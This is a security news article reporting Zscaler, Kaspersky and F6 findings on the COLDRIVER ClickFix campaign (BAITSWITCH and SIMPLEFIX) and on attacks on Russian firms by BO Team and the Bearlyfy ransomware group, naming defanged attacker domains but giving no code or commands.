Russian Hackers COLDRIVER Unleash New Malware in Targeted Attacks

A Russian hacking group, known as COLDRIVER, is making headlines again. Security researchers have linked them to a new wave of "ClickFix" attacks. These attacks are designed to deliver two new pieces of malware, which researchers are calling BAITSWITCH and SIMPLEFIX.

Zscaler ThreatLabz, the team that uncovered this latest campaign, describes BAITSWITCH as a downloader. Its main job? To install SIMPLEFIX, a sneaky PowerShell backdoor onto compromised systems.

Who is COLDRIVER?

COLDRIVER, also known by names like Callisto, Star Blizzard, and UNC4057, is a hacking group with ties to Russia. They've been targeting a wide variety of sectors since 2019. Initially, they used spear-phishing to trick people into handing over their credentials. But now, they're getting more sophisticated, developing custom tools like SPICA and LOSTKEYS.

Back in May 2025, Google's Threat Intelligence Group (GTIG) already highlighted COLDRIVER's use of ClickFix tactics. They were using fake websites with CAPTCHA prompts to trick users into running PowerShell commands that installed the LOSTKEYS Visual Basic Script.

"The fact that they keep using ClickFix suggests it's still working, even if it's not exactly cutting-edge," said Zscaler researchers Sudeep Singh and Yin Hong Chang.

How the Latest Attack Works

This new attack follows a similar pattern. Users are tricked into running a malicious file (a DLL) through the Windows Run dialog, thinking they're just completing a CAPTCHA. This DLL, BAITSWITCH, then grabs the SIMPLEFIX backdoor from a server controlled by the attackers (captchanom[.]top). To make things look innocent, a fake document hosted on Google Drive is shown to the victim.

BAITSWITCH also sends system information to the attacker's server, receives commands to maintain its presence on the system, stores encrypted data in the Windows Registry, and downloads a PowerShell tool. It even tries to cover its tracks by deleting the last command run in the Run dialog.

The PowerShell tool then downloads SIMPLEFIX from another server (southprovesolutions[.]com). SIMPLEFIX then connects to a command-and-control (C2) server, allowing the attackers to run PowerShell scripts, commands, and other malicious programs.

One of the PowerShell scripts that SIMPLEFIX executes steals information about specific file types from a list of directories. This list is similar to the one used by the LOSTKEYS malware.

According to Zscaler, "COLDRIVER typically goes after NGOs, human rights advocates, think tanks in Western countries, and Russians living in exile. This new campaign seems to fit that pattern, targeting civil society members with connections to Russia."

Other Groups Targeting Russia

It's not just COLDRIVER. Kaspersky recently reported that the BO Team (aka Black Owl, Hoody Hyena, and Lifting Zmiy) launched a phishing campaign against Russian companies in early September. They used password-protected RAR archives to deliver a new version of BrockenDoor and an updated ZeronetKit.

ZeronetKit is a Golang backdoor with the ability to remotely access compromised systems, upload/download files, run commands using cmd.exe, and create TCP/IPv4 tunnels. Newer versions can even download and run shellcode and update the C2 server list.

Kaspersky explained that "ZeronetKit can't persist on its own, so attackers use BrockenDoor to copy the backdoor to startup."

Then there's Bearlyfy, a new group that's been using ransomware like LockBit 3.0 and Babuk to attack Russian organizations. They started with smaller companies and smaller ransoms, but by April 2025, they were going after bigger targets, according to F6. By August 2025, they had claimed at least 30 victims.

In one case, they exploited a vulnerability in Bitrix to gain initial access to a consulting company, then used the Zerologon flaw to gain more privileges. In another incident in July, initial access was gained through a partner company.

F6 researchers noted that "In the most recent attack, the ransom demand was €80,000 in cryptocurrency. But in the first attack, the ransom was only a few thousand dollars. Because the ransoms are relatively low, about one in five victims actually pay for the decryptors."

Bearlyfy is believed to be active since January 2025. Analysis of their tools suggests possible links to a pro-Ukrainian group called PhantomCore, which has been targeting Russian and Belarusian companies since 2022. However, Bearlyfy is considered to be a separate group.

According to F6, "PhantomCore uses complex, multi-stage attacks typical of APTs. Bearlyfy, on the other hand, uses a different approach: quick attacks focused on immediate impact. They exploit external services and vulnerable applications to gain initial access, and their main goal is to encrypt, destroy, or modify data."